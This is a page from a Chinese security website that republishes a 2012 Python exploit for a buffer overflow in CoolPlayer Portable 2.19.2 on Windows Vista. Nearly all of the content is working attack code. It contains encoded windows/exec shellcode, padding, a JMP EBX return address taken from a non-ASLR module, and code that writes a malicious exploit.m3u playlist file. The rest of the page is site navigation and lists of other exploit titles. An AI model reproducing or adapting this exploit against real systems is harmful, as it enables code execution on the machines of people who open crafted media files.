首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass
来源:dhruval1987@gmail.com 作者:Dhruval 发布时间:2012-08-06  

# Buffer overflow that bypasses ASLR by using a non-aslr module
# Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit
# Written by Blake patched by Dhruval(dhruval1987@gmail.com)
# Originally found by Securityxxxpert

print "\n====================================="
print "CoolPlayer Portable Buffer Overflow"
print "Tested on Windows Vista (ASLR Bypass)"
print "Written by Blake"
print "Patched by Dhruval"
print "=====================================\n"

# 233 bytes for shellcode available
# 227 byte windows/exec shellcode => CMD=calc.exe
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
"\x51\x58")


nops = "\x90" * 6
buffer = "\x41" * (229 - len(shellcode))

eip = "\x75\x52\x46\x00" # JMP EBX - coolplayer.exe "\x75\x52\x46\x00" 


print "[+] Creating malicious file"
try:
 file = open("exploit.m3u","w")
 file.write(nops + shellcode + buffer + eip)
 file.close()
 print "[+] File created successfully"
 raw_input("[+] Press any key to exit...")
except:
 print "[X] Error creating file!"
 sys.exit(0)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD Kernel SCTP Remote NUL
·VLC 2.0.2 Division By Zero
·Zenoss 3 showDaemonXMLConfig C
·Cisco Linksys PlayerPT ActiveX
·Dell SonicWALL Scrutinizer 9 S
·Nvidia Linux Driver Privilege
·AOL Products downloadUpdater2
·httpdx 1.5.5 Denial of Service
·CoolPlayer+ Portable 2.19.2 Bu
·Psexec Via Current User Token
·Oracle AutoVue ActiveX Control
·Microsoft Internet Explorer Fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved